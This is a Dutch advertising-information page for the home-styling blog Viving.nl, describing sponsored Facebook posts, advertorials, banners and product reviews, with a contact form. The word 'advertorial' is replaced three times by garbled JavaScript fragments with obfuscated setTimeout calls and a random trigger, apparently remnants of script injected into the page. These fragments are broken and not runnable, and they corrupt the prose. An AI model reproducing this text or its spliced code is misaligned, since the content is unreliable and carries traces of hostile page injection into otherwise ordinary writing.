Adverteren op Viving.nl

Viving.nl trekt maandelijks veel unieke bezoekers. De doelgroep bestaat voornamelijk uit vrouwen met een interesse voor styling, woontrends, woonartikelen en do-it-yourself ideeën. Op Facebook hebben we een actieve fanbase bestaande uit 100+ fans. Ook kun je inspiratie op doen via onze Pinterest pagina. Daar zijn inmiddels al meer dan 150 pins gepind en hebben we veel volgers.

Sponsored Facebook Post

U kunt een persoonlijke boodschap op de Facebook pagina van Viving.nl plaatsen. Deze post wordt dan onder de aandacht gebracht bij de fans (en eventueel hun vrienden) om zo een grote groep mensen te bereiken.

Adverdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torial

Wilt u uw bedrijf onder de aandacht brengen? Dat kan door het plaatsen van een adverdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torial op het Viving.nl blog. In het artikel zal gelinked worden naar uw website. Viving.nl plaatst alleen adverdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torials die relevant zijn voor de doelgroep.

Banner

Het is mogelijk een banner te plaatsen op diverse posities op Viving.nl. Een banner is een afbeelding die in de zijbalk van de website staat. Zo bent u gedurende een bepaalde periode prominent zichtbaar op Viving.nl. De banner linked naar uw producten op de website van Viving.nl.

Product Reviews & Tests

Heeft u een nieuw product en wilt u deze graag getest zien? Dat kan! Viving.nl test producten en schrijft reviews. Neem contact via het contactformulier voor meer informatie.

Contact

Heeft u interesse in een van de advertentie mogelijkheden van Viving.nl? Neem dan contact op.

Naam (verplicht)

E-mailadres (verplicht)

Onderwerp

Waar kan ik je mee helpen?